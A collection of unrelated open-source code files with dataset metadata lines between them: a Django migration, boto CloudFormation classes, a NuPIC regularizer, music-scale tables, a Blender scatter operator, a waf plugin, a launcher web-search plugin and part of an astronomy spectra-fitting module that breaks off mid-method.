model_name='catalog',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this catalog in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this catalog in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='catalog',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this catalog in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='catalog',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this catalog (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='catalog',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this catalog.', max_length=256, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='questionset',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this questionset.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang1',
field=models.TextField(blank=True, help_text='The help text for this questionset in the primary language.', verbose_name='Help (primary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang2',
field=models.TextField(blank=True, help_text='The help text for this questionset in the secondary language.', verbose_name='Help (secondary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang3',
field=models.TextField(blank=True, help_text='The help text for this questionset in the tertiary language.', verbose_name='Help (tertiary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang4',
field=models.TextField(blank=True, help_text='The help text for this questionset in the quaternary language.', verbose_name='Help (quaternary)'),
),
migrations.AlterField(
model_name='questionset',
name='help_lang5',
field=models.TextField(blank=True, help_text='The help text for this questionset in the quinary language.', verbose_name='Help (quinary)'),
),
migrations.AlterField(
model_name='questionset',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this questionset.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='questionset',
name='path',
field=models.CharField(blank=True, help_text='The path part of the URI of this questionset (auto-generated).', max_length=512, verbose_name='Path'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this questionset in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this questionset in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this questionset in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this questionset in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='questionset',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this questionset in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='questionset',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this questionset (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='questionset',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this questionset.', max_length=256, verbose_name='URI Prefix'),
),
migrations.AlterField(
model_name='section',
name='comment',
field=models.TextField(blank=True, help_text='Additional internal information about this section.', verbose_name='Comment'),
),
migrations.AlterField(
model_name='section',
name='key',
field=models.SlugField(blank=True, help_text='The internal identifier of this section.', max_length=128, verbose_name='Key'),
),
migrations.AlterField(
model_name='section',
name='path',
field=models.CharField(blank=True, help_text='The path part of the URI of this section (auto-generated).', max_length=512, verbose_name='Label'),
),
migrations.AlterField(
model_name='section',
name='title_lang1',
field=models.CharField(blank=True, help_text='The title for this section in the primary language.', max_length=256, verbose_name='Title (primary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang2',
field=models.CharField(blank=True, help_text='The title for this section in the secondary language.', max_length=256, verbose_name='Title (secondary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang3',
field=models.CharField(blank=True, help_text='The title for this section in the tertiary language.', max_length=256, verbose_name='Title (tertiary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang4',
field=models.CharField(blank=True, help_text='The title for this section in the quaternary language.', max_length=256, verbose_name='Title (quaternary)'),
),
migrations.AlterField(
model_name='section',
name='title_lang5',
field=models.CharField(blank=True, help_text='The title for this section in the quinary language.', max_length=256, verbose_name='Title (quinary)'),
),
migrations.AlterField(
model_name='section',
name='uri',
field=models.URLField(blank=True, help_text='The Uniform Resource Identifier of this section (auto-generated).', max_length=640, verbose_name='URI'),
),
migrations.AlterField(
model_name='section',
name='uri_prefix',
field=models.URLField(blank=True, help_text='The prefix for the URI of this section.', max_length=256, verbose_name='URI Prefix'),
),
]
| apache-2.0 | 1,959,474,701,729,166,000 | 49.081081 | 170 | 0.612412 | false | 4.370283 | false | false | false |
canvasnetworks/canvas | common/boto/cloudformation/stack.py | 10 | 9892 | from datetime import datetime
from boto.resultset import ResultSet
class Stack:
def __init__(self, connection=None):
self.connection = connection
self.creation_time = None
self.description = None
self.disable_rollback = None
self.notification_arns = []
self.outputs = []
self.parameters = []
self.stack_id = None
self.stack_status = None
self.stack_name = None
        self.stack_status_reason = None
self.timeout_in_minutes = None
def startElement(self, name, attrs, connection):
if name == "Parameters":
self.parameters = ResultSet([('member', Parameter)])
return self.parameters
elif name == "Outputs":
self.outputs = ResultSet([('member', Output)])
return self.outputs
else:
return None
def endElement(self, name, value, connection):
if name == 'CreationTime':
self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == "Description":
self.description = value
elif name == "DisableRollback":
self.disable_rollback = bool(value)
elif name == "NotificationARNs":
self.notification_arns = value
elif name == 'StackId':
self.stack_id = value
elif name == 'StackName':
self.stack_name = value
elif name == 'StackStatus':
self.stack_status = value
elif name == "StackStatusReason":
self.stack_status_reason = value
elif name == "TimeoutInMinutes":
self.timeout_in_minutes = int(value)
elif name == "member":
pass
else:
setattr(self, name, value)
def delete(self):
return self.connection.delete_stack(stack_name_or_id=self.stack_id)
def describe_events(self, next_token=None):
return self.connection.describe_stack_events(
stack_name_or_id=self.stack_id,
next_token=next_token
)
def describe_resource(self, logical_resource_id):
return self.connection.describe_stack_resource(
stack_name_or_id=self.stack_id,
logical_resource_id=logical_resource_id
)
def describe_resources(self, logical_resource_id=None,
physical_resource_id=None):
return self.connection.describe_stack_resources(
stack_name_or_id=self.stack_id,
logical_resource_id=logical_resource_id,
physical_resource_id=physical_resource_id
)
def list_resources(self, next_token=None):
return self.connection.list_stack_resources(
stack_name_or_id=self.stack_id,
next_token=next_token
)
def update(self):
rs = self.connection.describe_stacks(self.stack_id)
if len(rs) == 1 and rs[0].stack_id == self.stack_id:
self.__dict__.update(rs[0].__dict__)
else:
raise ValueError("%s is not a valid Stack ID or Name" %
self.stack_id)
def get_template(self):
return self.connection.get_template(stack_name_or_id=self.stack_id)
class StackSummary:
def __init__(self, connection=None):
self.connection = connection
self.stack_id = None
self.stack_status = None
self.stack_name = None
self.creation_time = None
self.deletion_time = None
self.template_description = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'StackId':
self.stack_id = value
elif name == 'StackStatus':
self.stack_status = value
elif name == 'StackName':
self.stack_name = value
elif name == 'CreationTime':
self.creation_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == "DeletionTime":
self.deletion_time = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
elif name == 'TemplateDescription':
self.template_description = value
elif name == "member":
pass
else:
setattr(self, name, value)
class Parameter:
def __init__(self, connection=None):
self.connection = None
self.key = None
self.value = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "ParameterKey":
self.key = value
elif name == "ParameterValue":
self.value = value
else:
setattr(self, name, value)
def __repr__(self):
return "Parameter:\"%s\"=\"%s\"" % (self.key, self.value)
class Output:
def __init__(self, connection=None):
self.connection = connection
self.description = None
self.key = None
self.value = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "Description":
self.description = value
elif name == "OutputKey":
self.key = value
elif name == "OutputValue":
self.value = value
else:
setattr(self, name, value)
def __repr__(self):
return "Output:\"%s\"=\"%s\"" % (self.key, self.value)
class StackResource:
def __init__(self, connection=None):
self.connection = connection
self.description = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
self.stack_id = None
self.stack_name = None
self.timestamp = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "Description":
self.description = value
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
elif name == "StackId":
self.stack_id = value
elif name == "StackName":
self.stack_name = value
elif name == "Timestamp":
self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
else:
setattr(self, name, value)
def __repr__(self):
return "StackResource:%s (%s)" % (self.logical_resource_id,
self.resource_type)
class StackResourceSummary:
def __init__(self, connection=None):
self.connection = connection
self.last_updated_timestamp = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "LastUpdatedTimestamp":
            self.last_updated_timestamp = datetime.strptime(value,
                '%Y-%m-%dT%H:%M:%SZ')
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
else:
setattr(self, name, value)
def __repr__(self):
return "StackResourceSummary:%s (%s)" % (self.logical_resource_id,
self.resource_type)
class StackEvent:
valid_states = ("CREATE_IN_PROGRESS", "CREATE_FAILED", "CREATE_COMPLETE",
"DELETE_IN_PROGRESS", "DELETE_FAILED", "DELETE_COMPLETE")
def __init__(self, connection=None):
self.connection = connection
self.event_id = None
self.logical_resource_id = None
self.physical_resource_id = None
self.resource_properties = None
self.resource_status = None
self.resource_status_reason = None
self.resource_type = None
self.stack_id = None
self.stack_name = None
self.timestamp = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == "EventId":
self.event_id = value
elif name == "LogicalResourceId":
self.logical_resource_id = value
elif name == "PhysicalResourceId":
self.physical_resource_id = value
elif name == "ResourceProperties":
self.resource_properties = value
elif name == "ResourceStatus":
self.resource_status = value
elif name == "ResourceStatusReason":
self.resource_status_reason = value
elif name == "ResourceType":
self.resource_type = value
elif name == "StackId":
self.stack_id = value
elif name == "StackName":
self.stack_name = value
elif name == "Timestamp":
self.timestamp = datetime.strptime(value, '%Y-%m-%dT%H:%M:%SZ')
else:
setattr(self, name, value)
def __repr__(self):
return "StackEvent %s %s %s" % (self.resource_type,
self.logical_resource_id, self.resource_status)
| bsd-3-clause | 7,997,148,358,143,673,000 | 33.228374 | 79 | 0.577638 | false | 4.243672 | false | false | false |
mrcslws/nupic.research | nupic/research/frameworks/backprop_structure/experiments/mixins/regularize.py | 3 | 2518 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
class Regularize(object):
def __init__(self, reg_schedule=None, downscale_reg_with_training_set=False,
**kwargs):
"""
@param reg_schedule (dict)
Mapping from epoch number to the reg_weight to use on that timestep and
afterward.
@param downscale_reg_with_training_set (bool)
If True, multiply the regularization term by (1 / size_of_training_set)
"""
super().__init__(**kwargs)
if downscale_reg_with_training_set:
self.reg_coefficient = 1 / len(self.dataset_manager.get_train_dataset(0))
else:
self.reg_coefficient = 1
if reg_schedule is None:
self.reg_schedule = {}
self.reg_weight = 1.0
else:
self.reg_schedule = reg_schedule
self.reg_weight = reg_schedule[0]
def _regularization(self):
reg = None # Perform accumulation on the device.
for layer in self.network.modules():
if hasattr(layer, "regularization"):
if reg is None:
reg = layer.regularization()
else:
reg += layer.regularization()
if reg is None:
return 0
else:
return (self.reg_weight
* self.reg_coefficient
* reg)
def run_epoch(self, iteration):
if iteration in self.reg_schedule:
self.reg_weight = self.reg_schedule[iteration]
return super().run_epoch(iteration)
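# Illustrative configuration sketch (hypothetical values, not part of the original mixin):
# a reg_schedule that starts the regularization weight at 1.0 and lowers it at epochs 30 and 60,
# with the regularization term downscaled by the size of the training set.
#
#   config = {"reg_schedule": {0: 1.0, 30: 0.3, 60: 0.1},
#             "downscale_reg_with_training_set": True}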
| agpl-3.0 | 6,127,967,217,921,844,000 | 36.029412 | 85 | 0.586974 | false | 4.496429 | false | false | false |
pruperting/python-music-gen | midiutil/Scales.py | 4 | 2527 | """
Music Scales
Source: http://en.wikipedia.org/wiki/List_of_musical_scales_and_modes
Copyright (C) 2012 Alfred Farrugia
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
ACOUSTIC_SCALE = [0, 2, 4, 6, 7, 9, 10]
ADONAI_MALAKH = [0, 2, 4, 5, 7, 8, 10]
AEOLIAN_MODE = [0, 2, 3, 5, 7, 8, 10]
ALGERIAN_SCALE = [0, 2, 3, 6, 7, 8, 11]
ALTERED_SCALE = [0, 1, 3, 4, 6, 8, 10]
AUGMENTED_SCALE = [0, 3, 4, 7, 8, 11]
BEBOP_DOMINANT = [0, 2, 4, 5, 7, 9, 10, 11]
BLUES_SCALE = [0, 3, 5, 6, 7, 10]
DORIAN_MODE = [0, 2, 3, 5, 7, 9, 10]
DOUBLE_HARMONIC_SCALE = [0, 1, 4, 5, 7, 8, 11]
ENIGMATIC_SCALE = [0, 1, 4, 6, 8, 10, 11]
FLAMENCO_MODE = [0, 1, 4, 5, 7, 8, 11]
GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 10]
HALF_DIMINISHED_SCALE = [0, 2, 3, 5, 6, 8, 10]
HARMONIC_MAJOR_SCALE = [0, 2, 4, 5, 7, 8, 11]
HARMONIC_MINOR_SCALE = [0, 2, 3, 5, 7, 8, 11]
HIRAJOSHI_SCALE = [0, 4, 6, 7, 11]
HUNGARIAN_GYPSY_SCALE = [0, 2, 3, 6, 7, 8, 11]
INSEN_SCALE = [0, 1, 5, 7, 10]
IONIAN_MODE = [0, 2, 4, 5, 7, 9, 11]
IWATO_SCALE = [0, 1, 5, 6, 11]
LOCRIAN_MODE = [0, 1, 3, 5, 6, 8, 10]
LYDIAN_AUGMENTED_SCALE = [0, 2, 4, 6, 8, 9, 11]
LYDIAN_MODE = [0, 2, 4, 6, 7, 9, 11]
MAJOR_LOCRIAN = [0, 2, 4, 5, 6, 8, 10]
MELODIC_MINOR_SCALE = [0, 2, 3, 5, 7, 9, 11]
MIXOLYDIAN_MODE = [0, 2, 4, 5, 7, 9, 10]
NEAPOLITAN_MAJOR_SCALE = [0, 1, 3, 5, 7, 9, 11]
NEAPOLITAN_MINOR_SCALE = [0, 1, 3, 5, 7, 8, 11]
PERSIAN_SCALE = [0, 1, 4, 5, 6, 8, 11]
PHRYGIAN_MODE = [0, 1, 3, 5, 7, 8, 10]
PROMETHEUS_SCALE = [0, 2, 4, 6, 9, 10]
TRITONE_SCALE = [0, 1, 4, 6, 7, 10]
UKRAINIAN_DORIAN_SCALE = [0, 2, 3, 6, 7, 9, 10]
WHOLE_TONE_SCALE = [0, 2, 4, 6, 8, 10]
MAJOR = [0, 2, 4, 5, 7, 9, 11]
MINOR = [0, 2, 3, 5, 7, 8, 10]
"""
Build a scale given an array s
Example: to build a scale between 0 and 128 using the notes C, D, E
buildScale([0,2,4],0,128)
"""
def buildScale(s, min_note=0, max_note=128):
return [x + (12 * j)
for j in range(12)
for x in s
if x + (12 * j) >= min_note and x + (12 * j) <= max_note]
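# Illustrative example (not part of the original module), assuming MIDI note numbers with middle C = 60:
# buildScale(MAJOR, 60, 72) == [60, 62, 64, 65, 67, 69, 71, 72]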
| gpl-3.0 | -3,992,176,263,368,867,000 | 33.148649 | 69 | 0.607835 | false | 2.226432 | false | false | false |
mrachinskiy/blender-addon-jewelcraft | op_scatter/__init__.py | 1 | 2581 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# JewelCraft jewelry design toolkit for Blender.
# Copyright (C) 2015-2019 Mikhail Rachinskiy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# ##### END GPL LICENSE BLOCK #####
from bpy.types import Operator
from bpy.props import IntProperty, FloatProperty, BoolProperty
from .scatter_ui import UI
from .scatter_func import Scatter
class OBJECT_OT_jewelcraft_curve_scatter(UI, Scatter, Operator):
bl_label = "JewelCraft Curve Scatter"
bl_description = "Scatter selected object along active curve"
bl_idname = "object.jewelcraft_curve_scatter"
bl_options = {"REGISTER", "UNDO"}
is_scatter = True
number: IntProperty(name="Object Number", default=10, min=1, soft_max=100)
rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION")
rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION")
loc_z: FloatProperty(name="Position", unit="LENGTH")
start: FloatProperty(name="Start")
end: FloatProperty(name="End", default=100.0)
use_absolute_offset: BoolProperty(name="Absolute Offset")
spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH")
class OBJECT_OT_jewelcraft_curve_redistribute(UI, Scatter, Operator):
bl_label = "JewelCraft Curve Redistribute"
bl_description = "Redistribute selected objects along curve"
bl_idname = "object.jewelcraft_curve_redistribute"
bl_options = {"REGISTER", "UNDO"}
is_scatter = False
rot_y: FloatProperty(name="Orientation", step=10, unit="ROTATION", options={"SKIP_SAVE"})
rot_z: FloatProperty(name="Rotation", step=10, unit="ROTATION", options={"SKIP_SAVE"})
loc_z: FloatProperty(name="Position", unit="LENGTH", options={"SKIP_SAVE"})
start: FloatProperty(name="Start")
end: FloatProperty(name="End", default=100.0)
use_absolute_offset: BoolProperty(name="Absolute Offset", options={"SKIP_SAVE"})
spacing: FloatProperty(name="Spacing", default=0.2, unit="LENGTH")
| mit | -3,390,926,506,677,198,300 | 38.106061 | 93 | 0.717164 | false | 3.54533 | false | false | false |
tobiasjakobi/mpv | waftools/clang_compilation_database.py | 27 | 2379 | #!/usr/bin/env python
# encoding: utf-8
# Christoph Koke, 2013
# Original source: waflib/extras/clang_compilation_database.py from
# waf git 15d14c7bdf2e (New BSD License)
"""
Writes the c and cpp compile commands into build/compile_commands.json
see http://clang.llvm.org/docs/JSONCompilationDatabase.html
Usage:
def configure(conf):
conf.load('compiler_cxx')
...
conf.load('clang_compilation_database')
"""
import sys, os, json, shlex, pipes
from waflib import Logs, TaskGen
from waflib.Tools import c, cxx
if sys.hexversion >= 0x3030000:
quote = shlex.quote
else:
quote = pipes.quote
@TaskGen.feature('*')
@TaskGen.after_method('process_use')
def collect_compilation_db_tasks(self):
"Add a compilation database entry for compiled tasks"
try:
clang_db = self.bld.clang_compilation_database_tasks
except AttributeError:
clang_db = self.bld.clang_compilation_database_tasks = []
self.bld.add_post_fun(write_compilation_database)
for task in getattr(self, 'compiled_tasks', []):
if isinstance(task, (c.c, cxx.cxx)):
clang_db.append(task)
def write_compilation_database(ctx):
"Write the clang compilation database as JSON"
database_file = ctx.bldnode.make_node('compile_commands.json')
Logs.info("Build commands will be stored in %s" % database_file.path_from(ctx.path))
try:
root = json.load(database_file)
except IOError:
root = []
clang_db = dict((x["file"], x) for x in root)
for task in getattr(ctx, 'clang_compilation_database_tasks', []):
try:
cmd = task.last_cmd
except AttributeError:
continue
directory = getattr(task, 'cwd', ctx.variant_dir)
f_node = task.inputs[0]
filename = os.path.relpath(f_node.abspath(), directory)
cmd = " ".join(map(quote, cmd))
entry = {
"directory": directory,
"command": cmd,
"file": filename,
}
clang_db[filename] = entry
root = list(clang_db.values())
database_file.write(json.dumps(root, indent=2))
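# Illustrative output sketch (hypothetical paths, not produced by this exact build): each entry
# written to compile_commands.json has the form
#   {"directory": "/path/to/build", "command": "gcc -c ... demo.c", "file": "../src/demo.c"}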
| gpl-2.0 | -4,243,942,583,667,116,500 | 34.507463 | 92 | 0.575032 | false | 3.958403 | false | false | false |
BGS/pyLauncher | plugins/pyLWeb.py | 1 | 1610 |
# -*- coding: utf-8 -*-
'''
pyLauncher: Windows Application Launcher
Copyright (C) Blaga Florentin Gabriel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
info = {"name" : "pyLWeb",
"author" : "Blaga Florentin Gabriel <https://github.com/BGS/pyLauncher>",
"category": "pylSearchExtensions",
"version": "1.0",
"class" : "execWebSearch"}
class execWebSearch():
def parseQuery(self, query):
query = query.split()
args = query[1:]
if query:
if query[0] == "google":
os.startfile("http://www.google.com/search?source=pyLauncher&q=%s" % " ".join(args))
elif query[0] == "wikipedia":
os.startfile("http://en.wikipedia.org/wiki/Special:Search?search=%s&fulltext=Search" % " ".join(args))
elif query[0] == "youtube":
os.startfile("http://www.youtube.com/results?search_query=%s" % " ".join(args))
else:
pass
| gpl-3.0 | 4,868,357,547,482,469,000 | 29.377358 | 118 | 0.628571 | false | 3.788235 | false | false | false |
JohanComparat/pySU | galaxy/python/ModelSpectraStacks.py | 1 | 22503 | """
.. moduleauthor:: Johan Comparat <johan.comparat__at__gmail.com>
General purpose:
................
The class ModelSpectraStacks is dedicated to modelling and extracting information from stacks of spectra.
*Imports*::
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
import os
import astropy.cosmology as co
cosmo=co.FlatLambdaCDM(H0=70,Om0=0.3)
import astropy.units as u
import astropy.io.fits as fits
import numpy as n
from scipy.optimize import curve_fit
from scipy.interpolate import interp1d
from scipy.stats import scoreatpercentile
import astropy.io.fits as fits
from lineListAir import *
import LineFittingLibrary as lineFit
"""
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as p
import os
from os.path import join
import astropy.cosmology as co
cosmo=co.Planck13 #co.FlatLambdaCDM(H0=70,Om0=0.3)
import astropy.units as u
import astropy.io.fits as fits
import numpy as n
from scipy.optimize import curve_fit
from scipy.interpolate import interp1d
from scipy.stats import scoreatpercentile
import astropy.io.fits as fits
from lineListVac import *
allLinesList = n.array([ [Ne3,Ne3_3869,"Ne3_3869","left"], [Ne3,Ne3_3968,"Ne3_3968","left"], [O3,O3_4363,"O3_4363","right"], [O3,O3_4960,"O3_4960","left"], [O3,O3_5007,"O3_5007","right"], [H1,H1_3970,"H1_3970","right"], [H1,H1_4102,"H1_4102","right"], [H1,H1_4341,"H1_4341","right"], [H1,H1_4862,"H1_4862","left"]])
# other lines that are optional
# [N2,N2_6549,"N2_6549","left"], [N2,N2_6585,"N2_6585","right"] , [H1,H1_6564,"H1_6564","left"]
# , [S2,S2_6718,"S2_6718","left"], [S2,S2_6732,"S2_6732","right"], [Ar3,Ar3_7137,"Ar3_7137","left"], [H1,H1_1216,"H1_1216","right"]
doubletList = n.array([[O2_3727,"O2_3727",O2_3729,"O2_3729",O2_mean]])
# import the fitting routines
import LineFittingLibrary as lineFit
#O2a=3727.092
#O2b=3729.875
#O2=(O2a+O2b)/2.
#Hg=4102.892
#Hd=4341.684
#Hb=4862.683
#O3a=4960.295
#O3b=5008.240
#Ha=6564.61
fnu = lambda mAB : 10**(-(mAB+48.6)/2.5) # erg/cm2/s/Hz
flambda= lambda mAB, ll : 10**10 * c*1000 * fnu(mAB) / ll**2. # erg/cm2/s/A
kla=lambda ll :2.659 *(-2.156+1.509/ll-0.198/ll**2+0.011/ll**3 ) + 4.05
klb=lambda ll :2.659 *(-1.857+1.040/ll)+4.05
def kl(ll):
"""Calzetti extinction law"""
if ll>6300:
return klb(ll)
if ll<=6300:
return kla(ll)
class ModelSpectraStacks:
"""
This class fits the emission lines on the continuum-subtracted stack.
:param stack_file: fits file generated with a LF in a luminosity bin.
:param cosmo: cosmology class from astropy
:param firefly_min_wavelength: minimum wavelength considered by firefly (default : 1000)
	:param firefly_max_wavelength: maximum wavelength considered by firefly (default : 7500)
	:param dV: default placeholder value used for missing measurements (default : -9999.99)
	:param N_spectra_limitFraction: if the stack was made with N spectra, selects only the points that were computed using more than N_spectra_limitFraction * N spectra. (default : 0.8)
"""
def __init__(self, stack_file, model_file, mode="MILES", cosmo=cosmo, firefly_min_wavelength= 1000., firefly_max_wavelength=7500., dV=-9999.99, N_spectra_limitFraction=0.8, tutorial = False, eboss_stack = False):
self.stack_file = stack_file
self.stack_file_base = os.path.basename(stack_file)[:-5]
self.lineName = self.stack_file_base[:7]
self.stack_model_file = model_file
self.mode = mode
self.tutorial = tutorial
self.eboss_stack = eboss_stack
# retrieves the firefly model for the stack: stack_model_file
"""
if self.mode=="MILES":
self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-MILES.fits")
if self.mode=="STELIB":
self.stack_model_file = join( os.environ['SPECTRASTACKS_DIR'], "fits", self.lineName, self.stack_file_base + "-SPM-STELIB.fits")
"""
if self.tutorial :
self.stack_model_file = join( os.environ['DATA_DIR'], "ELG-composite", self.stack_file_base + "-SPM-MILES.fits")
if self.mode=="EBOSS": #eboss_stack :
self.stack_model_file = join(os.environ['EBOSS_TARGET'],"elg", "tests", "stacks", "fits", self.stack_file_base[:-6]+ "-SPM-MILES.fits")
self.redshift = 0.85
else :
self.redshift = float(self.stack_file_base.split('-')[2].split('_')[0][1:])
self.cosmo = cosmo
self.firefly_max_wavelength = firefly_max_wavelength
self.firefly_min_wavelength = firefly_min_wavelength
self.dV = dV
self.side = ''
self.N_spectra_limitFraction = N_spectra_limitFraction
# define self.sphereCM, find redshift ...
sphere=4*n.pi*( self.cosmo.luminosity_distance(self.redshift) )**2.
self.sphereCM=sphere.to(u.cm**2)
self.hdus = fits.open(self.stack_file)
self.hdR = self.hdus[0].header
self.hdu1 = self.hdus[1] # .data
print "Loads the data."
#print self.hdu1.data.dtype
if self.tutorial :
wlA, flA, flErrA = self.hdu1.data['WAVE'][0], self.hdu1.data['FLUXMEDIAN'][0]*10**(-17), self.hdu1.data['FLUXMEDIAN_ERR'][0]*10**(-17)
self.selection = (flA>0)
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
self.flLineSpectrum=n.array([self.stack(xx)-self.model(xx) for xx in self.wlLineSpectrum])
self.fl_frac_LineSpectrum=n.array([self.stack(xx)/self.model(xx) for xx in self.wlLineSpectrum])
self.flErrLineSpectrum=self.stackErr(self.wlLineSpectrum)
elif eboss_stack :
print self.hdu1.data.dtype
wlA,flA,flErrA = self.hdu1.data['wavelength'], self.hdu1.data['meanWeightedStack']*10**(-17), self.hdu1.data['jackknifStackErrors'] * 10**(-17)
self.selection = (flA>0)
self.wl,self.fl,self.flErr = wlA[self.selection], flA[self.selection], flErrA[self.selection]
self.stack=interp1d(self.wl,self.fl)
self.stackErr=interp1d(self.wl,self.flErr)
# loads model :
hdus = fits.open(self.stack_model_file)
self.hdu2 = hdus[1] # .data
self.wlModel,self.flModel = self.hdu2.data['wavelength'], self.hdu2.data['firefly_model']*10**(-17)
self.model=interp1d(n.hstack((self.wlModel,[n.max(self.wlModel)+10,11000])), n.hstack(( self.flModel, [n.median(self.flModel[:-20]),n.median(self.flModel[:-20])] )) )
# wavelength range common to the stack and the model :
self.wlLineSpectrum = n.arange(n.max([self.stack.x.min(),self.model.x.min()]), n.min([self.stack.x.max(),self.model.x.max()]), 0.5)[2:-1]
